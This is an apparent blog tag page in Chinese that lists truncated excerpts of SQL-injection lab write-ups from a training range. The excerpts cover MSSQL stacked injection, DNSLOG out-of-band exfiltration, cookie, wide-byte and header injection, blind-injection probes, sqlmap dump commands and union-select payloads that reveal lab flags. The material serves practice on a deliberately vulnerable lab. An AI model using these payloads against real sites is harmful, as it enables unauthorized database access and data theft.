MSSQL 反弹注入 堆叠注入 与 MSSQL速查
MSSQL 反弹注入 堆叠注入 与 MSSQL速查 https://hack.zkaq.cn/battle/target?id=7dd07600c96f5d55 蠢到爆了 数据库自带库,表信息也可以使用 反弹 方式获取 数据库自带库,表信息也可以使用 反弹 方式获取 数据库自带库,表信息也可以使用 反弹 方式获取 数据库自带库,表信息也可以使用 反弹 方式获取 数据库自带库,表信息也可以使用 反弹 方式获取 数据库自带库,表信息也可以……
包含标签 SQL注入 中的文章
SQL注入 - DNSLOG注入 与 WAF绕过
SQL注入 - DNSLOG注入 与 WAF绕过 https://hack.zkaq.cn/battle/target?id=9b8ee696eb01591e 0x00 为什么经常说 完全和运维工作要左移(参考 CI/CD 流程) ? 不管说什么, 商业的本质是赚钱, 阻挡赚钱的一切都是异端。 在任何时候 信息收集 都很重要。 分析的对象是 信息 , 被利用对象的本质是 疏漏 。 信息分析可以找出这些疏漏 文件解析漏洞: 任意文件被指定解释器调用。……
SQL注入-偏移注入
偏移注入 cookie 注入是类似于 POST 或者 GET 传参方式的一种。在 post 或 get 传入参数被反制的时候,可以尝试使用 cookie 注入。 常见的修改 cookie 值的方式有以下几种 浏览器,开发者工具 ,console 控制台。 documents.cookie="id=171" documents.cookie="id="+escape("171 order by 11") 。 其中 escape 为 js 函数, 作用是进行 url 编码。 浏览器插件 burpsuite 抓包修改 access 数据库 access 本身没有库的概念, 更像是 表的集合 access 本……
SQL注入之 宽字节注入
SQL注入之 宽字节注入 http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1 利用原理: 利用数据库 支持的 多字节 编码特性, 将 转义符号 的 编码 ** 与编码** 顺位组合, 使 转义符号 失去原有的意义, 从而达到逃脱的目的。 这里 多字节 不一定是 双字节 如 (GBK)。 在其他字符集环境下,可能是其他字节, 例如 UTF-8 的三字节 。 在最左侧闭合逃脱的时候,可以使用 宽字节 方……
Head 注入 - X-Forwarded-For 注入 (XFF)
Head 注入 - X-Forwarded-For 注入 (XFF) 注意 burpsuite http 文件有自己的格式, HEAD 信息之间 不能有 空格。 X-Forwarded-For 单词不要写错。 X-Forwarded-For 在直接请求时,burpsuite 抓包中没有。 因此需要手工传入。 在每一步都需要仔细认真,切忌焦躁、贪多 ,事情往往就在最后一步事情平常心而导致失败。 使用 burpsuite 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /Pass-09/index.php HTTP/1.1 Host:……
SQL注入之 head 注入与引号绕过
SQL注入之 head 注入与引号绕过 http://injectx1.lab.aqlab.cn:81/Pass-07/index.php?action=show_codea 0x00 先说结论 使用 -- gg 比 --+ 更通用,GET 中 + 会转为 空格 但 POST 中不会 其他而言, HEAD 注入与参数注入利用方式差别不大。 目前看来 INSERT 最难利用的是在判断 字段 插入位置和值对应类型 。 使用 updatexml() 函数报错 xpath 由于 0x7e 是 ~ ,不属于xpath语法格式, 因此报出xpath语法错误。 0x01 分析代码……
掌控安全 SQL 注入靶场练习 - Dnslog 带外测试
掌控安全 SQL 注入靶场练习 - Dnslog 带外测试 dnslog 带外实现 依赖 UNC , 因此只能在 Windows 下利用 利用 DNS 记录不存在时向上查询的工作模式实现带外攻击 不支持 load_file('http://host:port/1.txt') 模式, 否则用不着 dns 了。 OOB 带外中心思想 将本地数据 select ... 通过触发器 load_file( ... ) 将结果传递到外部(含文件)xx.dnslog.cn 0x00 先说结论 0x00.1 dnslog 结果只会缓存 10 个, 超过 10……
查询 MYSQL 数据库 系统库名、表名、字段名 SQL语句
查询 MYSQL 数据库 系统库名、表名、字段名 SQL语句 注意: 由于 引号 的原因, 盲注时字符探测不能使用 字符 。 而应该使用 ASCII 进行转换。 0x01 数据库探测 0x01.1 数据库数量探测 1 2 3 -- 数据库数量探测 http://vulhub.example.com:81/Pass-10/index.php?id=1 AND (SELECT COUNT(*) FROM information_schema.SCHEMATA)=6 0x01.2 当前数据库名称探测 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 -- 查询当前数据库有多少张表 SELECT COUNT(*) FROM information_schema.`TABLES` WHERE TABLE_SCHEMA=database(); --……
掌控安全 SQL 注入靶场练习 - 时间盲注
掌控安全 SQL 注入靶场练习 - 时间盲注 SQL 时间盲注 0x01 使用 SQLMAP 工具 0x01.1 dump database 1 ./sqlmap.py -u http://vulhub.example.com:81/Pass-10/index.php?id=1 --current-db 执行结果 current database: 'kanwolongxia' 0x01.2 dump tables 1 ./sqlmap.py -u http://vulhub.example.com:81/Pass-10/index.php?id=1 -D kanwolongxia --tables 执行结果 Database: kanwolongxia [3 tables] +--------+ | user | | loflag | | news | +--------+ 3 tables: user, loflag, news 0x01.3 dump columns 1 ./sqlmap.py -u http://vulhub.example.com:81/Pass-10/index.php?id=1 -D kanwolongxia -T loflag --columns 执行结果 Database: kanwolongxia Table: loflag [2 columns] +--------+--------------+ | Column | Type | +--------+--------------+ | flaglo | varchar(255) | | Id | int(11) | +--------+--------------+ 0x01.4 dump values 1 ./sqlmap.py -u http://vulhub.example.com:81/Pass-10/index.php?id=1 -D kanwolongxia -T loflag -C flaglo --dump 执行结果 Database: kanwolongxia Table: loflag [5 entries]……
掌控安全 SQL 注入靶场练习 - 引号括号错误注入
掌控安全 SQL 注入靶场练习 - 引号括号错误注入 根据之前的经验,已经猜测出过关 Flag 的值了。 接下来两关是 引号 与 括号 的组合。 0x01 括号单引号 注意闭合 单引号 和 括号 1 2 3 4 --- 1. 注意闭合 单引号 和 括号 http://vulhub.example.com:81/Pass-03/index.php?id=1') and 1=2 union select 1,2,(select group_concat(flag) from error_flag) --+ 1 --- flags: zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K 0x02 括号双引号 注意闭合 单引号 和 括号 1 2 3 4 --- 1. 注意闭合 双引号 和 括号 http://vulhub.example.com:81/Pass-04/index.php?id=1") and 1=2 union select 1,2,(select group_concat(flag)……
